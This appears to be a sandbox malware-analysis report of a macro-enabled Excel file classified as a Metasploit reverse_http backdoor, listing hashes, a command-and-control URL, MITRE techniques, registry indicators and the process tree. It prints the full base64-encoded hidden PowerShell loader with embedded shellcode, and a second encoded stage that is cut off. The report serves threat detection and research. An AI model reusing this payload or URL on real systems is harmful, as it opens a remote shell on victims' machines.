metasploit | 5d5b8308cb4e2b8953d0ae655fbf3280831791c6aab585baaffac755edccda2b

Analysis

max time kernel
138s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
07-12-2024 22:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5d5b8308cb4e2b8953d0ae655fbf3280831791c6aab585baaffac755edccda2b.xlsm
Size

84KB
MD5

c03a7136157d7368cc6593e7123400d3
SHA1

da6a164c4aabbf2f650ef04a40921ebdc32f1fbe
SHA256

5d5b8308cb4e2b8953d0ae655fbf3280831791c6aab585baaffac755edccda2b
SHA512

290ccf748d6f74ce0c25d5440f2f0e98fac76e8b99edb81c49c547030e95f1da98217a430ab79e21186381c0e3e2be9a7e112d5d038b96ba587b6f594cad01ee
SSDEEP

1536:ZBgfmM2qygswi7+nVWQ0hF6Rlykl+/6bFLWxRr+jikaS8FzZBlRFJM6kbm5O:wHzZziMVPkKyO+CJQ+jikaS8zJiaO

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_http

http://192.168.100.13:44863/96KM-ROoWJ5n6GbpAMFcbQ-spvwPN

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2088	3964	powershell.exe	82

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2088	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3964	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2088	powershell.exe
2088	powershell.exe
640	powershell.exe
640	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2088	powershell.exe
Token: SeDebugPrivilege	640	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
3964	EXCEL.EXE
3964	EXCEL.EXE
3964	EXCEL.EXE
3964	EXCEL.EXE
3964	EXCEL.EXE
3964	EXCEL.EXE
3964	EXCEL.EXE
3964	EXCEL.EXE
3964	EXCEL.EXE
3964	EXCEL.EXE
3964	EXCEL.EXE
3964	EXCEL.EXE

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 3964 wrote to memory of 2088	3964	EXCEL.EXE	87
PID 3964 wrote to memory of 2088	3964	EXCEL.EXE	87
PID 2088 wrote to memory of 640	2088	powershell.exe	89
PID 2088 wrote to memory of 640	2088	powershell.exe	89
PID 2088 wrote to memory of 640	2088	powershell.exe	89
PID 640 wrote to memory of 2228	640	powershell.exe	90
PID 640 wrote to memory of 2228	640	powershell.exe	90
PID 640 wrote to memory of 2228	640	powershell.exe	90
PID 2228 wrote to memory of 4864	2228	csc.exe	92
PID 2228 wrote to memory of 4864	2228	csc.exe	92
PID 2228 wrote to memory of 4864	2228	csc.exe	92

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\5d5b8308cb4e2b8953d0ae655fbf3280831791c6aab585baaffac755edccda2b.xlsm"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3964
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoE -NoP -NonI -W Hidden -E JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAGMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAcwBjACAAPQAgADAAeABmAGMALAAwAHgAZQA4ACwAMAB4ADgAZgAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADAALAAwAHgAMwAxACwAMAB4AGQAMgAsADAAeAA4ADkALAAwAHgAZQA1ACwAMAB4ADYANAAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADMAMAAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADAAYwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEANAAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAYwAwACwAMAB4AGEAYwAsADAAeAAzAGMALAAwAHgANgAxACwAMAB4ADcAYwAsADAAeAAwADIALAAwAHgAMgBjACwAMAB4ADIAMAAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4ADQAOQAsADAAeAA3ADUALAAwAHgAZQBmACwAMAB4ADUAMgAsADAAeAA1ADcALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADAALAAwAHgAOABiACwAMAB4ADQAMgAsADAAeAAzAGMALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4AGIALAAwAHgANAAwACwAMAB4ADcAOAAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeAA0AGMALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4AGIALAAwAHgANAA4ACwAMAB4ADEAOAAsADAAeAA1ADAALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAyADAALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA4ADUALAAwAHgAYwA5ACwAMAB4ADcANAAsADAAeAAzAGMALAAwAHgAMwAxACwAMAB4AGYAZgAsADAAeAA0ADkALAAwAHgAOABiACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQANgAsADAAeAAzADEALAAwAHgAYwAwACwAMAB4AGEAYwAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4ADMAOAAsADAAeABlADAALAAwAHgANwA1ACwAMAB4AGYANAAsADAAeAAwADMALAAwAHgANwBkACwAMAB4AGYAOAAsADAAeAAzAGIALAAwAHgANwBkACwAMAB4ADIANAAsADAAeAA3ADUALAAwAHgAZQAwACwAMAB4ADUAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIANAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADYANgAsADAAeAA4AGIALAAwAHgAMABjACwAMAB4ADQAYgAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADEAYwAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAAwADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgAOAA5ACwAMAB4ADQANAAsADAAeAAyADQALAAwAHgAMgA0ACwAMAB4ADUAYgAsADAAeAA1AGIALAAwAHgANgAxACwAMAB4ADUAOQAsADAAeAA1AGEALAAwAHgANQAxACwAMAB4AGYAZgAsADAAeABlADAALAAwAHgANQA4ACwAMAB4ADUAZgAsADAAeAA1AGEALAAwAHgAOABiACwAMAB4ADEAMgAsADAAeABlADkALAAwAHgAOAAwACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4ADUAZAAsADAAeAA2ADgALAAwAHgANgBlACwAMAB4ADYANQAsADAAeAA3ADQALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA3ADcALAAwAHgANgA5ACwAMAB4ADYAZQAsADAAeAA2ADkALAAwAHgANQA0ACwAMAB4ADYAOAAsADAAeAA0AGMALAAwAHgANwA3ACwAMAB4ADIANgAsADAAeAAwADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAAzADEALAAwAHgAZABiACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADMAYQAsADAAeAA1ADYALAAwAHgANwA5ACwAMAB4AGEANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADAAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAAzAGYALAAwAHgAYQBmACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAZQA4ACwAMAB4AGIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAyAGYALAAwAHgAMwA5ACwAMAB4ADMANgAsADAAeAA0AGIALAAwAHgANABkACwAMAB4ADIAZAAsADAAeAA1ADIALAAwAHgANABmACwAMAB4ADYAZgAsADAAeAA1ADcALAAwAHgANABhACwAMAB4ADMANQAsADAAeAA2AGUALAAwAHgAMwA2ACwAMAB4ADQANwAsADAAeAA2ADIALAAwAHgANwAwACwAMAB4ADQAMQAsADAAeAA0AGQALAAwAHgANAA2ACwAMAB4ADYAMwAsADAAeAA2ADIALAAwAHgANQAxACwAMAB4ADIAZAAsADAAeAA3ADMALAAwAHgANwAwACwAMAB4ADcANgAsADAAeAA3ADcALAAwAHgANQAwACwAMAB4ADQAZQAsADAAeAAwADAALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADkAZgAsADAAeABjADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADkALAAwAHgAYwA2ACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADMAMgAsADAAeABlADgALAAwAHgAOAA0ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeABlAGIALAAwAHgANQA1ACwAMAB4ADIAZQAsADAAeAAzAGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADYALAAwAHgANgBhACwAMAB4ADAAYQAsADAAeAA1AGYALAAwAHgANgA4ACwAMAB4ADgAMAAsADAAeAAzADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA4ADkALAAwAHgAZQAwACwAMAB4ADYAYQAsADAAeAAwADQALAAwAHgANQAwACwAMAB4ADYAYQAsADAAeAAxAGYALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAA3ADUALAAwAHgANAA2ACwAMAB4ADkAZQAsADAAeAA4ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAyAGQALAAwAHgAMAA2ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeAAxADYALAAwAHgANgA4ACwAMAB4ADgAOAAsADAAeAAxADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANAA0ACwAMAB4AGYAMAAsADAAeAAzADUALAAwAHgAZQAwACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANABmACwAMAB4ADcANQAsADAAeABjAGQALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeABiADUALAAwAHgAYQAyACwAMAB4ADUANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAxADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA0ADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgANQA4ACwAMAB4AGEANAAsADAAeAA1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgAOAA5ACwAMAB4AGUANwAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAxADIALAAwAHgAOQA2ACwAMAB4ADgAOQAsADAAeABlADIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeABjAGQALAAwAHgAOABiACwAMAB4ADAANwAsADAAeAAwADEALAAwAHgAYwAzACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4AGUANQAsADAAeAA1ADgALAAwAHgAYwAzACwAMAB4ADUAZgAsADAAeABlADgALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeAAzADkALAAwAHgAMwAyACwAMAB4ADIAZQAsADAAeAAzADEALAAwAHgAMwA2ACwAMAB4ADMAOAAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADMAMAAsADAAeAAzADAALAAwAHgAMgBlACwAMAB4ADMAMQAsADAAeAAzADMALAAwAHgAMAAwADsAJABzAGkAegBlACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHMAYwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABzAGkAegBlACAAPQAgACQAcwBjAC4ATABlAG4AZwB0AGgAfQA7ACQAeAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAHMAaQB6AGUALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHMAYwAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB4AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJABzAGMAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZwBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkADEAKQApADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAHgAOAA2ACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABjAG0AZAAgAD0AIAAiAC0AbgBvAHAAIAAtAG4AbwBuAGkAIAAtAGUAbgBjACAAIgA7AGkAZQB4ACAAIgAmACAAJAB4ADgANgAgACQAYwBtAGQAIAAkAGcAcQAiAH0AZQBsAHMAZQB7ACQAYwBtAGQAIAA9ACAAIgAtAG4AbwBwACAALQBuAG8AbgBpACAALQBlAG4AYwAiADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABjAG0AZAAgACQAZwBxACIAOwB9AA==
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2088
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABjACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAYwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJABzAGMAIAA9ACAAMAB4AGYAYwAsADAAeABlADgALAAwAHgAOABmACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAAzADEALAAwAHgAZAAyACwAMAB4ADgAOQAsADAAeABlADUALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAOABiACwAMAB4ADcAMgAsADAAeAAyADgALAAwAHgAMABmACwAMAB4AGIANwAsADAAeAA0AGEALAAwAHgAMgA2ACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgANAA5ACwAMAB4ADcANQAsADAAeABlAGYALAAwAHgANQAyACwAMAB4ADUANwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAA4AGIALAAwAHgANAAyACwAMAB4ADMAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAYgAsADAAeAA0ADAALAAwAHgANwA4ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4ADQAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAYgAsADAAeAA0ADgALAAwAHgAMQA4ACwAMAB4ADUAMAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIAMAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgANQAsADAAeABjADkALAAwAHgANwA0ACwAMAB4ADMAYwAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADQAOQAsADAAeAA4AGIALAAwAHgAMwA0ACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgAZAA2ACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYQBjACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAMwA4ACwAMAB4AGUAMAAsADAAeAA3ADUALAAwAHgAZgA0ACwAMAB4ADAAMwAsADAAeAA3AGQALAAwAHgAZgA4ACwAMAB4ADMAYgAsADAAeAA3AGQALAAwAHgAMgA0ACwAMAB4ADcANQAsADAAeABlADAALAAwAHgANQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgA0ACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgANgA2ACwAMAB4ADgAYgAsADAAeAAwAGMALAAwAHgANABiACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMQBjACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADAANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4ADkALAAwAHgANAA0ACwAMAB4ADIANAAsADAAeAAyADQALAAwAHgANQBiACwAMAB4ADUAYgAsADAAeAA2ADEALAAwAHgANQA5ACwAMAB4ADUAYQAsADAAeAA1ADEALAAwAHgAZgBmACwAMAB4AGUAMAAsADAAeAA1ADgALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA4AGIALAAwAHgAMQAyACwAMAB4AGUAOQAsADAAeAA4ADAALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgANQBkACwAMAB4ADYAOAAsADAAeAA2AGUALAAwAHgANgA1ACwAMAB4ADcANAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADcANwAsADAAeAA2ADkALAAwAHgANgBlACwAMAB4ADYAOQAsADAAeAA1ADQALAAwAHgANgA4ACwAMAB4ADQAYwAsADAAeAA3ADcALAAwAHgAMgA2ACwAMAB4ADAANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADMAMQAsADAAeABkAGIALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMwBhACwAMAB4ADUANgAsADAAeAA3ADkALAAwAHgAYQA3ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2AGEALAAwAHgAMAAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADMAZgAsADAAeABhAGYALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeABlADgALAAwAHgAYgAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADIAZgAsADAAeAAzADkALAAwAHgAMwA2ACwAMAB4ADQAYgAsADAAeAA0AGQALAAwAHgAMgBkACwAMAB4ADUAMgAsADAAeAA0AGYALAAwAHgANgBmACwAMAB4ADUANwAsADAAeAA0AGEALAAwAHgAMwA1ACwAMAB4ADYAZQAsADAAeAAzADYALAAwAHgANAA3ACwAMAB4ADYAMgAsADAAeAA3ADAALAAwAHgANAAxACwAMAB4ADQAZAAsADAAeAA0ADYALAAwAHgANgAzACwAMAB4ADYAMgAsADAAeAA1ADEALAAwAHgAMgBkACwAMAB4ADcAMwAsADAAeAA3ADAALAAwAHgANwA2ACwAMAB4ADcANwAsADAAeAA1ADAALAAwAHgANABlACwAMAB4ADAAMAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4ADUANwAsADAAeAA4ADkALAAwAHgAOQBmACwAMAB4AGMANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgAOQAsADAAeABjADYALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMwAyACwAMAB4AGUAOAAsADAAeAA4ADQALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA3ACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4AGUAYgAsADAAeAA1ADUALAAwAHgAMgBlACwAMAB4ADMAYgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkANgAsADAAeAA2AGEALAAwAHgAMABhACwAMAB4ADUAZgAsADAAeAA2ADgALAAwAHgAOAAwACwAMAB4ADMAMwAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADgAOQAsADAAeABlADAALAAwAHgANgBhACwAMAB4ADAANAAsADAAeAA1ADAALAAwAHgANgBhACwAMAB4ADEAZgAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB